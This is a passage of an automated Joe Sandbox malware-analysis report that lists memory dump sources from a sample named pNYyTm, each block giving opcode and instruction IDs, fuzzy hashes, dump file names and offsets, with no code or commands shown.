                    • Opcode Fuzzy Hash: 86f65a8bfed85c19c73ffd7538d7c74c413fb01e3211cc0f1f16f457da9ddbd4
                    • Instruction Fuzzy Hash: FBE0B6B0D44209DFD780EFB9C915A5EBBF0FF08600F2185AAD419E7212E7749A058F91
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                    • Instruction ID: 6e3423a9709f6b5dec4828936fa6b3bc44a83f72210ab58be065c42f5d80cdd4
                    • Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                    • Instruction Fuzzy Hash: 68D0677898E204DFDB45CF92D4449EDBBFCBB0B300B02A586AD1A5F613C67494869E80
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 66b49b63e115e547fd063ceba79292a5c5900decb10d17fe75e3bcf47a47bd94
                    • Instruction ID: 8f2ed30f46096651d0a032853f367950b10fed07c8e4988c34ee8f70904abf0d
                    • Opcode Fuzzy Hash: 66b49b63e115e547fd063ceba79292a5c5900decb10d17fe75e3bcf47a47bd94
                    • Instruction Fuzzy Hash: 49D0172020A3C16FC306CB38C854A52BFA4DFE7210B18C0EEA084CB2A3DA359906C361
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                    • Instruction ID: 205e063ba1dd443f419dc1abe3ade9f623dc6d3a6c83b4bc3f5e57daaa267a22
                    • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                    • Instruction Fuzzy Hash: 79D05272C00138EB8B10AFE99C088EFFF78EF09A50B428122E914AB200D3710A21CBC1
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d87cd6994ea3c517515e56b40b5b71b2f6b9357455426b3f227cfeb0d63b76b7
                    • Instruction ID: d99030c0df0d806ba2467bb528aaa7f04c1fa22a2789e088c3702f4bc84b3572
                    • Opcode Fuzzy Hash: d87cd6994ea3c517515e56b40b5b71b2f6b9357455426b3f227cfeb0d63b76b7
                    • Instruction Fuzzy Hash: C4D0C97290520CFF8B04DFE48A409AEBBFDDF4A100B5145E6A906EB611FE719E1097E1
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9b98bab79cbd539217b5964004e9084798ddff774a180a095f9d17183077241d
                    • Instruction ID: 806ffbf9f4602f99d7a73af9c09a03ff4d25828a6692ecf61b8244a52e0d3e58
                    • Opcode Fuzzy Hash: 9b98bab79cbd539217b5964004e9084798ddff774a180a095f9d17183077241d
                    • Instruction Fuzzy Hash: 24D0C97290520CEFCB04DFA8D94099EB7FDEF4A100B5045E6DA4AE7210FE319A1057E1
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 596646be73ad0084c838f62353f3ba8f62d6b3dc5251f940c163ed08b9df7dfb
                    • Instruction ID: af7da04160e05387c634ca999970407dc14e7ad87f42da413a3dde86991d500b
                    • Opcode Fuzzy Hash: 596646be73ad0084c838f62353f3ba8f62d6b3dc5251f940c163ed08b9df7dfb
                    • Instruction Fuzzy Hash: E6D0C9321101085F4B91EF95E844C5277D9AB65610701C422A9048A122E621E424D751
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2f1d664bd5a42dc200f17d40f40ea20a69619edd9c58ff4c25a90dbc90d6cef
                    • Instruction ID: 2dae72d44743735bdb69ab5427d19186ed8883f05c5057a7aa098402f0ee958e
                    • Opcode Fuzzy Hash: b2f1d664bd5a42dc200f17d40f40ea20a69619edd9c58ff4c25a90dbc90d6cef
                    • Instruction Fuzzy Hash: 58C08C3085160887D6802BA0F90C328B7BD5B06302F002022D70C405528BB00450CAE9
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 214f7a0b5725d16d8521891c45b3837b14b759b4d1ff6c19206e708a0bbfe28b
                    • Instruction ID: 604899e7fd469178471f11f54ad8da0b0abde420d625fd1730aae316b4695e6b
                    • Opcode Fuzzy Hash: 214f7a0b5725d16d8521891c45b3837b14b759b4d1ff6c19206e708a0bbfe28b
                    • Instruction Fuzzy Hash: E5C09B364081059F9B86BB50C9D4D29B7F1FF56314BC2CC57B54546032D771C8199712
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37ff7f15ac1abffd6813ea63779fede4ba0d8c5efa55cc05a448645fe13b87ac
                    • Instruction ID: c80923674351b1cb4c9fb5b3b6f061de7db86ec8d519d73cb2200bdf0f352609
                    • Opcode Fuzzy Hash: 37ff7f15ac1abffd6813ea63779fede4ba0d8c5efa55cc05a448645fe13b87ac
                    • Instruction Fuzzy Hash: 22B0127B29C242EBADC432608CD1F1FA012ABA6700BC2CC077625420018AF04865D27F
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b1c0f233d165edfee32bab4b3dea9104ed5833e0253e54099e3a0cb8a985377a
                    • Instruction ID: 89f9ee7610ab6252efc8270cc3775c6136c1e9d19212fff18378e9791c0451b6
                    • Opcode Fuzzy Hash: b1c0f233d165edfee32bab4b3dea9104ed5833e0253e54099e3a0cb8a985377a
                    • Instruction Fuzzy Hash: E6C04C35D08205DFDB71CF60D4444AC7B75AB4D255B25501AB42753113D72018418F80
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ee2feb94136644e675d2a4d679c27e74cd12f98251b4df26c63caaa8c2bf59a7
                    • Instruction ID: 9ac9e19f81d659f9065995f163d117337dcf9cd7d86c23163ff551f43752247e
                    • Opcode Fuzzy Hash: ee2feb94136644e675d2a4d679c27e74cd12f98251b4df26c63caaa8c2bf59a7
                    • Instruction Fuzzy Hash: 6AB012300196854FC710CB00CC0CB8B7BA89B00241F01005398044A062CA21014D9A05
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0bc3030b1f24988821e1e011538443a054f30d2c4362a18d44e3f72bd839dcaa
                    • Instruction ID: d3e9a24cdec0ea82c9f94d67452589cfe74706be5741cdf64844251a4de22600
                    • Opcode Fuzzy Hash: 0bc3030b1f24988821e1e011538443a054f30d2c4362a18d44e3f72bd839dcaa
                    • Instruction Fuzzy Hash: 7DA0023145A840DFDE820A69848CB78B678EB092457A61891555A96152DB5148054958
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b83e6504163400f7c9caca224013c0b61cb36a5c77aeee0047069c6dfb0f8d11
                    • Instruction ID: 6c558ef54cce0090287c8e3fde936205f142b20a45645511b572b8d32467443f
                    • Opcode Fuzzy Hash: b83e6504163400f7c9caca224013c0b61cb36a5c77aeee0047069c6dfb0f8d11
                    • Instruction Fuzzy Hash: D1028D707113048FDB18AB78D858B6E7BA6FF88700F148578E516AB3A5DF789C418F91
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1770e0a6254b3ccedf44890202451997dee288573134d5ec9add36b4ee7f5d57
                    • Instruction ID: 086925380c15879d076cad47ba1155040a8907e55d318c0907ba388e2f77124e
                    • Opcode Fuzzy Hash: 1770e0a6254b3ccedf44890202451997dee288573134d5ec9add36b4ee7f5d57
                    • Instruction Fuzzy Hash: 27E1BD707113008FDB19AF74E86876E7BA6FF88200B148578D816AB7A5DF789C85CF91
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87cef3f1eb8a89b27040a99c24a0c8bbacf4ea71180a1aebc19488cbb25644f0
                    • Instruction ID: a07c106850d3e8d1d52506738e87f22d9fb7f5819c7da397d32215ef8740ebf1
                    • Opcode Fuzzy Hash: 87cef3f1eb8a89b27040a99c24a0c8bbacf4ea71180a1aebc19488cbb25644f0
                    • Instruction Fuzzy Hash: FF918B347102008FEB18AB79D85477E7AA3FF88700F248568D91AAB795DFB99C418B91
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6fb01c48e0dcf3003edef3d6b8d7a60d1f9b97af8afe46cc05471b331d8425d2
                    • Instruction ID: f1314a18907676b0f63e1bbb523b3f31c5eac5016e43e7ebe2c25008a4b20254
                    • Opcode Fuzzy Hash: 6fb01c48e0dcf3003edef3d6b8d7a60d1f9b97af8afe46cc05471b331d8425d2
                    • Instruction Fuzzy Hash: C631E275B103059FDB08AFB9C8053AEBBAAFFD9600F10802DE54AE7751DE749C418B56
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb23d8b1788fa3cd82c7b0407e93f778ff736f19ad565fab83177b030daf139e
                    • Instruction ID: 47ef9bb48f11b02f6518a152d707bda112fcbe0672edbca17eca88f9789ecff5
                    • Opcode Fuzzy Hash: fb23d8b1788fa3cd82c7b0407e93f778ff736f19ad565fab83177b030daf139e
                    • Instruction Fuzzy Hash: 9421DD30B112158FCB59EB7D896463E7BE2BFC9200F2484ADE509DB392EE749D018796
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bd73f339425c782c306d46cf5af97ca1b12205ed8a7108b8626874ca47398aea
                    • Instruction ID: db0d060220da14bc1fa460a2f6fbc116d1d1120b48b5b002f57da7b8a75f0e5c
                    • Opcode Fuzzy Hash: bd73f339425c782c306d46cf5af97ca1b12205ed8a7108b8626874ca47398aea
                    • Instruction Fuzzy Hash: 3121F130B112158FCB59DB7D895063F7BE2BFC9200F2884ADE109EB392DE349D018795
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1c3973aaf24e500a037a897ddd0103c217fc809e5526f8c3bd11142825317509
                    • Instruction ID: 22e60b275e4b1da8753ac7c2be69bf4e3ba8c5b59b8746a1b919ea8ea809ec08
                    • Opcode Fuzzy Hash: 1c3973aaf24e500a037a897ddd0103c217fc809e5526f8c3bd11142825317509
                    • Instruction Fuzzy Hash: 92213C709103099FDB05EF74D4546AE7BB6FF89204F50856DD406A7350DB789A40CF51
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 787f6798a1be41ba52bfa357f4d60661a2d092209ec0a92dc63e1da4624d894e
                    • Instruction ID: f16a898e0dd9099312791f5a34f04b00244c6215cb1b669cc4b384cfa36e9523
                    • Opcode Fuzzy Hash: 787f6798a1be41ba52bfa357f4d60661a2d092209ec0a92dc63e1da4624d894e
                    • Instruction Fuzzy Hash: 5B216DB0A003099FDB05EFB4D8546AE7BBAFF89204F50856CD405A7340DB78AE80CF51
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d4cdeb5ed2996978268d903bd58ddd8266753ec632c0062713043012b11b93f9
                    • Instruction ID: 2457c3708a95d287681d6384cbb9a3aad643279a5f7fc0f5f1985058f1e92690
                    • Opcode Fuzzy Hash: d4cdeb5ed2996978268d903bd58ddd8266753ec632c0062713043012b11b93f9
                    • Instruction Fuzzy Hash: 3B21D430E15204CFDB58DFB8D5143AEBBB2EF88200F2481AAD109EB395DB749D55C786
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 524b995949d83e58ec2a760b910af13694b035bbd886bc5ad4cf76cfc21cc402
                    • Instruction ID: 624740f4ae259eefa106a4e9717865f209ea053dd8a86e7505e953868b6e6e2f
                    • Opcode Fuzzy Hash: 524b995949d83e58ec2a760b910af13694b035bbd886bc5ad4cf76cfc21cc402
                    • Instruction Fuzzy Hash: 7F2151B0211345CFDB02EF24F980B47777DFB46604744A6B8D445AB226D6BC6D89CF92
                    Memory Dump Source
                    • Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 525776b9e0cd2827da293ab235500036da55ba7e07a57af507947d4f7d2743ea
                    • Instruction ID: a3bb263ee98bb6773881691625d3a88231234c88f404213d34246ab7fdf7138f
                    • Opcode Fuzzy Hash: 525776b9e0cd2827da293ab235500036da55ba7e07a57af507947d4f7d2743ea
                    • Instruction Fuzzy Hash: 9E21A9B021130ADFDB01EF24F984A4773ADFB49644740A6B89445AB225E6BC6D89CF92